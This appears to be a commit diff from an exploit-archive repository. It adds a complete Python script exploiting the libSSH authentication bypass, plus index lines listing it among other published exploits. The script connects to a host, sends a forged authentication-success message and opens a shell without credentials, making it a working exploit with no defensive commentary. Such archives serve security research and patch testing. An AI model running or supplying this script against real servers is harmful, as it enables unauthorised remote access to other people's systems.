DB: 2018-10-20
1 changes to exploits/shellcodes libSSH - Authentication Bypass PHP-SHOP master 1.0 - Cross-Site Request Forgery (Add admin) PHP-SHOP master 1.0 - Cross-Site Request Forgery (Add Admin)
This commit is contained in:
parent
fa0fe9b6cf
commit
60464134cb
2 changed files with 54 additions and 1 deletions
52
exploits/linux/remote/45638.py
Executable file
52
exploits/linux/remote/45638.py
Executable file
|
@ -0,0 +1,52 @@
|
|||
#!/usr/bin/env python3
|
||||
import paramiko
|
||||
import socket
|
||||
import argparse
|
||||
from sys import argv, exit
|
||||
|
||||
|
||||
parser = argparse.ArgumentParser(description="libSSH Authentication Bypass")
|
||||
parser.add_argument('--host', help='Host')
|
||||
parser.add_argument('-p', '--port', help='libSSH port', default=22)
|
||||
parser.add_argument('-log', '--logfile', help='Logfile to write conn logs', default="paramiko.log")
|
||||
|
||||
args = parser.parse_args()
|
||||
|
||||
|
||||
def BypasslibSSHwithoutcredentials(hostname, port):
|
||||
|
||||
sock = socket.socket()
|
||||
try:
|
||||
sock.connect((str(hostname), int(port)))
|
||||
|
||||
message = paramiko.message.Message()
|
||||
transport = paramiko.transport.Transport(sock)
|
||||
transport.start_client()
|
||||
|
||||
message.add_byte(paramiko.common.cMSG_USERAUTH_SUCCESS)
|
||||
transport._send_message(message)
|
||||
|
||||
spawncmd = transport.open_session()
|
||||
spawncmd.invoke_shell()
|
||||
return 0
|
||||
|
||||
except paramiko.SSHException as e:
|
||||
print("TCPForwarding disabled on remote/local server can't connect. Not Vulnerable")
|
||||
return 1
|
||||
except socket.error:
|
||||
print("Unable to connect.")
|
||||
return 1
|
||||
|
||||
|
||||
def main():
|
||||
paramiko.util.log_to_file(args.logfile)
|
||||
try:
|
||||
hostname = args.host
|
||||
port = args.port
|
||||
except:
|
||||
parser.print_help()
|
||||
exit(1)
|
||||
BypasslibSSHwithoutcredentials(hostname, port)
|
||||
|
||||
if __name__ == '__main__':
|
||||
exit(main())
|
|
@ -16876,6 +16876,7 @@ id,file,description,date,author,type,platform,port
|
|||
45574,exploits/windows/remote/45574.rb,"Delta Electronics Delta Industrial Automation COMMGR 1.08 - Stack Buffer Overflow (Metasploit)",2018-10-09,Metasploit,remote,windows,502
|
||||
45611,exploits/windows/remote/45611.c,"NoMachine < 5.3.27 - Remote Code Execution",2018-10-15,hyp3rlinx,remote,windows,
|
||||
45629,exploits/hardware/remote/45629.txt,"FLIR AX8 Thermal Camera 1.32.16 - Hard-Coded Credentials",2018-10-17,LiquidWorm,remote,hardware,
|
||||
45638,exploits/linux/remote/45638.py,"libSSH - Authentication Bypass",2018-10-18,"Dayanç Soyadlı",remote,linux,
|
||||
6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
|
||||
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
|
||||
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
|
||||
|
@ -40151,5 +40152,5 @@ id,file,description,date,author,type,platform,port
|
|||
45632,exploits/hardware/webapps/45632.txt,"TP-Link TL-SC3130 1.6.18 - RTSP Stream Disclosure",2018-10-17,LiquidWorm,webapps,hardware,
|
||||
45633,exploits/php/webapps/45633.txt,"Time and Expense Management System 3.0 - 'table' SQL Injection",2018-10-17,"Ihsan Sencan",webapps,php,
|
||||
45635,exploits/php/webapps/45635.txt,"Learning with Texts 1.6.2 - 'start' SQL Injection",2018-10-18,"Ihsan Sencan",webapps,php,
|
||||
45636,exploits/php/webapps/45636.txt,"PHP-SHOP master 1.0 - Cross-Site Request Forgery (Add admin)",2018-10-18,"Alireza Norkazemi",webapps,php,80
|
||||
45636,exploits/php/webapps/45636.txt,"PHP-SHOP master 1.0 - Cross-Site Request Forgery (Add Admin)",2018-10-18,"Alireza Norkazemi",webapps,php,80
|
||||
45637,exploits/php/webapps/45637.txt,"OwnTicket 1.0 - 'TicketID' SQL Injection",2018-10-18,"Ihsan Sencan",webapps,php,
|
||||
|
|
Can't render this file because it is too large.
|
Loading…
Add table
Reference in a new issue